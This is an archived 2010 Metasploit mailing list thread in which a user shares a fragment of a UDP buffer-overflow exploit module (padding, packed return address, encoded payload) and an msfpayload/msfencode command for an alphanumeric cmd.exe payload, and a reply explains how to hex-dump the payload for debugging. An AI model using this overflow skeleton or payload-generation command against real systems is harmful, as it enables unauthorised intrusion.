Metasploit mailing list archives
Re: printing payload for debug
From: egypt () metasploit com
Date: Wed, 2 Jun 2010 09:45:30 -0600
What you have should work, but if there are funny characters in the string they will be printed, too, possibly causing problems with your terminal. Try using: print_status(Rex::Text.to_hex_dump(crash)) or if you just want the hex bytes: print_status(Rex::Text.to_hex(crash)) If you really want output identical to msfencode, see the various methods like Rex::Text.to_ruby Hope this helped, egypt On Wed, Jun 2, 2010 at 7:19 AM, nahidul kibria <nahidupa () gmail com> wrote:
hi, how can i print final exploit data as alpha numeric i mean x86/alpha_mixed before final send data def exploit connect_udp print_status("Building Crash") crash = "\x00\x01" crash += "\x41" * 256 crash += [target.ret].pack('V') crash += payload.encoded crash += "\x00" /////////try to print here.. print_status(crash) udp_sock.put(crash) disconnect_udp end or is there anyway to check final exploit output from ./msfconsole after setting all other options. the way msfpayload do. (./msfpayload windows/cxec cmd.exe R | ./msfencode -e x86/alpha_mixed) thanks _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- printing payload for debug nahidul kibria (Jun 02)
- Re: printing payload for debug egypt (Jun 02)